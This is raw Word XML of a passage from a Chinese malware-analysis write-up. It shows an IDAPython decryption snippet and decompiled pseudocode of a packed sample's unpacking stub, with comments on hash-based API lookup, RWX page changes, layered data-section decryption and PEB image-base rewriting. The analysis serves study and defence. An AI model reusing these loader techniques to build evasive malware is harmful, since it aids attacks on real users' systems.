      <w:r>
        <w:t xml:space="preserve">    b = Byte(srcaddr + off)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C651B" w:rsidRDefault="003C651B" w:rsidP="003C651B">
      <w:r>
        <w:t xml:space="preserve">    b = b ^ 0xA2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C651B" w:rsidRDefault="003C651B" w:rsidP="003C651B">
      <w:r>
        <w:t xml:space="preserve">    b = (((b &amp; 0x3) &lt;&lt; 6) | ((b &gt;&gt; 2) &amp; 0xff)) &amp; 0xff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C651B" w:rsidRDefault="003C651B" w:rsidP="003C651B">
      <w:r>
        <w:t xml:space="preserve">    b = (b + 0x100 - 0x6C) &amp; 0xff</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD5E37" w:rsidRDefault="00DD5E37" w:rsidP="00FE48DC">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:t>PatchByte(dstaddr + off, b)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009463B3" w:rsidRDefault="00134501" w:rsidP="00DD5E37">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6840855" cy="9664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B3" w:rsidRDefault="009463B3" w:rsidP="00DD5E37"/>
    <w:p w:rsidR="009463B3" w:rsidRDefault="009463B3" w:rsidP="00DD5E37"/>
    <w:p w:rsidR="0003433C" w:rsidRDefault="0003433C" w:rsidP="0003433C">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc467351365"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>解密第二层</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由前一步</w:t>
      </w:r>
      <w:r w:rsidR="00FE48DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解密出的新节可以分析出以下函数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C093D" w:rsidRDefault="002C093D" w:rsidP="002C093D">
      <w:r>
        <w:t>GetFunction        +018C</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C093D" w:rsidRDefault="002C093D" w:rsidP="002C093D">
      <w:r>
        <w:t>fiximport          +04C2</w:t>
      </w:r>
      <w:r w:rsidR="00566C50">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00566C50">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00566C50">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00566C50">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C093D" w:rsidRDefault="002C093D" w:rsidP="002C093D">
      <w:r>
        <w:t>decode             +05E8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C093D" w:rsidRDefault="002C093D" w:rsidP="002C093D">
      <w:r>
        <w:t>decode_1           +0743</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C093D" w:rsidRDefault="002C093D" w:rsidP="002C093D">
      <w:r>
        <w:t>getNtdllBase       +0783</w:t>
      </w:r>
      <w:r w:rsidR="002D19D6">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="002D19D6">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="002D19D6">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C093D" w:rsidRDefault="002C093D" w:rsidP="002C093D">
      <w:r>
        <w:t>sub_2309AF         +09AF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C093D" w:rsidRDefault="002C093D" w:rsidP="002C093D">
      <w:r>
        <w:t>UnmapSection       +0BD6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C093D" w:rsidRDefault="002C093D" w:rsidP="002C093D">
      <w:r>
        <w:t>zeromem            +0C15</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C093D" w:rsidRDefault="002C093D" w:rsidP="002C093D">
      <w:r>
        <w:t>fixreloc           +1758</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C093D" w:rsidRDefault="002C093D" w:rsidP="002C093D">
      <w:r>
        <w:t>sub_2318FB         +18FB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C093D" w:rsidRDefault="002C093D" w:rsidP="002C093D">
      <w:r>
        <w:t>decode_2           +1B35</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C093D" w:rsidRDefault="002C093D" w:rsidP="002C093D">
      <w:r>
        <w:t>Alloc              +1D68</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C093D" w:rsidRDefault="002C093D" w:rsidP="002C093D">
      <w:r>
        <w:t>resetself          +2275</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C093D" w:rsidRDefault="002C093D" w:rsidP="002C093D">
      <w:r>
        <w:t>memcpy             +22B0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C093D" w:rsidRDefault="002C093D" w:rsidP="002C093D">
      <w:r>
        <w:t>decode_0           +2454</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C093D" w:rsidRDefault="002C093D" w:rsidP="002C093D">
      <w:r>
        <w:t>sub_2326F9         +26F9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C093D" w:rsidRDefault="002C093D" w:rsidP="002C093D">
      <w:r>
        <w:t>sub_2326FB         +26FB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C093D" w:rsidRDefault="002C093D" w:rsidP="002C093D">
      <w:r>
        <w:t>new_main           +2CA9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C093D" w:rsidRDefault="002C093D" w:rsidP="002C093D">
      <w:r>
        <w:t>setmemoryexecute_  +2E13</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C093D" w:rsidRDefault="002C093D" w:rsidP="002C093D">
      <w:r>
        <w:t>loadimportdll      +2F2B</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C093D" w:rsidRDefault="002C093D" w:rsidP="002C093D">
      <w:r>
        <w:t>setmemoryexecute   +3077</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C093D" w:rsidRDefault="002C093D" w:rsidP="002C093D">
      <w:r>
        <w:t>GetFunctionFromEat +31D2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C093D" w:rsidRDefault="002C093D" w:rsidP="002C093D">
      <w:r>
        <w:t>nullsub_5          +329D</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C093D" w:rsidRDefault="002C093D" w:rsidP="002C093D">
      <w:r>
        <w:t>Free               +32A0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE48DC" w:rsidRDefault="002C093D" w:rsidP="002C093D">
      <w:r>
        <w:t>nullsub_4          +32E2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B7846" w:rsidRDefault="001B7846" w:rsidP="002C093D"/>
    <w:p w:rsidR="003348DF" w:rsidRPr="00FE48DC" w:rsidRDefault="00D72C07" w:rsidP="00FE48DC">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来到</w:t>
      </w:r>
      <w:r w:rsidR="003348DF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>入口点：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t>ULONG __cdecl new_main(int a1, int a2, int a3, int segbase)</w:t>
      </w:r>
      <w:r w:rsidR="008D3EB2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="008D3EB2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第四个参数为之前分配的内存</w:t>
      </w:r>
      <w:r w:rsidR="008C626B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基址</w:t>
      </w:r>
      <w:r w:rsidR="008D3EB2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x230000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">  v30 = -1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">  v29 = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">  v17 = getNtdllBase(0xE0605F88);</w:t>
      </w:r>
      <w:r w:rsidR="00E307A8">
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="00975E63">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析</w:t>
      </w:r>
      <w:r w:rsidR="00BB2873">
        <w:t>①</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">  NtQuerySystemInformation = (void (__stdcall *)(int, int, int, signed int, _SYSTEM_PERFORMANCE_INFORMATION *, signed int))GetFunction(v17, 0xFB145B9B);</w:t>
      </w:r>
      <w:r w:rsidR="00BB2873">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="00975E63">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析</w:t>
      </w:r>
      <w:r w:rsidR="00BB2873">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>②</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00670A13" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">  NtQuerySystemInformation(v20, v21, v22, 2, &amp;perfinfo, 0x138);</w:t>
      </w:r>
      <w:r w:rsidR="007239EE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="00670A13" w:rsidRPr="00670A13">
        <w:t xml:space="preserve"> SYSTEM_PERFORMANCE_INFORMATION</w:t>
      </w:r>
      <w:r w:rsidR="007239EE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>未发现实际作用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">  result = perfinfo.CopyOnWriteCount;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">  if ( (perfinfo.CopyOnWriteCount &lt;= 0x84D0 || perfinfo.CopyOnWriteCount &gt;= 0x8534)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">    &amp;&amp; (perfinfo.CopyOnWriteCount &lt;= 0x8660 || perfinfo.CopyOnWriteCount &gt;= 0x86C4) )</w:t>
      </w:r>
      <w:r w:rsidR="00670A13">
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="00670A13" w:rsidRPr="00670A13">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正常情况下可以直接进</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">  {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">    v35 = segbase;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">    modulebase = retaddr;                       //</w:t>
      </w:r>
      <w:r w:rsidR="00EF2579">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图</w:t>
      </w:r>
      <w:r w:rsidR="00EF2579">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="002846C5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>0x40</w:t>
      </w:r>
      <w:r w:rsidR="0031393D">
        <w:t>746D</w:t>
      </w:r>
      <w:r w:rsidR="0031393D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="0031393D">
        <w:t>为之前</w:t>
      </w:r>
      <w:r w:rsidR="0031393D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行的最后一个</w:t>
      </w:r>
      <w:r w:rsidR="0031393D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>call</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">    do</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">      modulebase = (_IMAGE_DOS_HEADER *)(((unsigned int)&amp;modulebase[-1].e_lfanew + 3) &gt;&gt; 15 &lt;&lt; 15);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">    while ( modulebase-&gt;e_magic != 'ZM' );</w:t>
      </w:r>
      <w:r w:rsidR="00E17E4B">
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="00E17E4B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找到主模块基址</w:t>
      </w:r>
      <w:r w:rsidR="00E17E4B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x400000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">    currentbase = modulebase;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">    v31 = *(WORD *)((char *)&amp;modulebase-&gt;e_cs + modulebase-&gt;e_lfanew);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">    v44 = 12;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">    v43 = 0x75115E4F;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    v42 = 0xFFD1A121;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">    v41 = 0x17E;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">    size = 0x6200;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">    a3a = 0x937D;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">    v40 = 0xC3A56632;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">    imagesize = *(_DWORD *)((char *)currentbase + *((_DWORD *)currentbase + 15) + 80);</w:t>
      </w:r>
      <w:r w:rsidR="00BB1D9D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="00BB1D9D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取</w:t>
      </w:r>
      <w:r w:rsidR="00BB1D9D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidR="00BB1D9D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模块大小</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">    setmemoryexecute_((int)modulebase, imagesize, 64, (int)&amp;v27);</w:t>
      </w:r>
      <w:r w:rsidR="00BB1D9D">
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="00BB1D9D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内存页提权</w:t>
      </w:r>
      <w:r w:rsidR="00F82BE4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00F82BE4">
        <w:t>读写</w:t>
      </w:r>
      <w:r w:rsidR="00F82BE4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">    v33 = (char *)currentbase + *(_DWORD *)((char *)currentbase + *((_DWORD *)currentbase + 15) + 40);</w:t>
      </w:r>
      <w:r w:rsidR="009C1627">
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="009C1627">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取入口点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">    membase = Alloc(0, size);</w:t>
      </w:r>
      <w:r w:rsidR="009C1627">
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="009C1627">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分配一段内存用作解密</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">    for ( dataseg = (int)currentbase; *(_DWORD *)da</w:t>
      </w:r>
      <w:r w:rsidR="009C1627">
        <w:t>taseg != 0xDF62A7E; ++dataseg )</w:t>
      </w:r>
      <w:r>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="00F71D79">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="00C84C73">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取</w:t>
      </w:r>
      <w:r w:rsidR="00C84C73">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r w:rsidR="00C84C73">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>节基址，</w:t>
      </w:r>
      <w:r w:rsidR="00975E63">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析</w:t>
      </w:r>
      <w:r w:rsidR="00F71D79">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>③</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">    v8 = dataseg + 4;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    decode(v8, a3a, v40);                       // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>段解密</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">    if ( v44 &amp; 8 )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">      a3a = decode_0((char *)v8, a3a, v42, v41);</w:t>
      </w:r>
      <w:r w:rsidR="00A76B77">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00A76B77">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="00A76B77">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第一次解密</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">    v10 = decode_2((char *)v8, a3a, v43);</w:t>
      </w:r>
      <w:r w:rsidR="00A76B77">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00A76B77">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00A76B77">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00A76B77">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="00A76B77">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第二次解密</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">    if ( v44 &amp; 4 )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">      decode_1(v11, (_BYTE *)membase, v10);</w:t>
      </w:r>
      <w:r w:rsidR="00A76B77">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00A76B77">
        <w:tab/>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="00A76B77">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第三次解密</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">    else</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">      memcpy((void *)membase, v10, a3a);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">    if ( v44 &amp; 0x10 )</w:t>
      </w:r>
      <w:r w:rsidR="006F58DF">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="006F58DF">
        <w:tab/>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="006F58DF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不走这里</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">      UnmapSection((int)currentbase);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">      Free((char)currentbase, imagesize);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">      v8 = *(_DWORD *)(membase + 60) + membase + 24;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">      imagesize = *(_DWORD *)(*(_DWORD *)(membase + 60) + membase + 0x50);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">      UnmapSection(*(_DWORD *)(v8 + 28));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">      Free(*(_DWORD *)(v8 + 28), *(_DWORD *)(v8 + 56));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">      currentbase = (void *)Alloc(*(_DWORD *)(v8 + 28), *(_DWORD *)(v8 + 56));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">      *(_DWORD *)(__readfsdword(48) + 8) = currentbase;// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Imagebase</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">    zeromem(v8, currentbase, imagesize);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">    v9 = *(_DWORD *)(membase + 60) + membase;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">    memcpy(currentbase, (const void *)membase, *(_DWORD *)(v9 + 0x54));</w:t>
      </w:r>
      <w:r w:rsidR="00A76B77">
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="00A76B77">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还原回</w:t>
      </w:r>
      <w:r w:rsidR="00A76B77">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0x400000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">    if ( v31 &amp; 0x2000 )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">      *(_WORD *)((char *)currentbase + *((_DWORD *)currentbase + 15) + 22) = v26;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">    v4 = *(_WORD *)(v9 + 6);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00137B45" w:rsidRDefault="00137B45" w:rsidP="00137B45">
      <w:r>
        <w:t xml:space="preserve">    v7 = v9 + 248;</w:t>
      </w:r>
    </w:p>
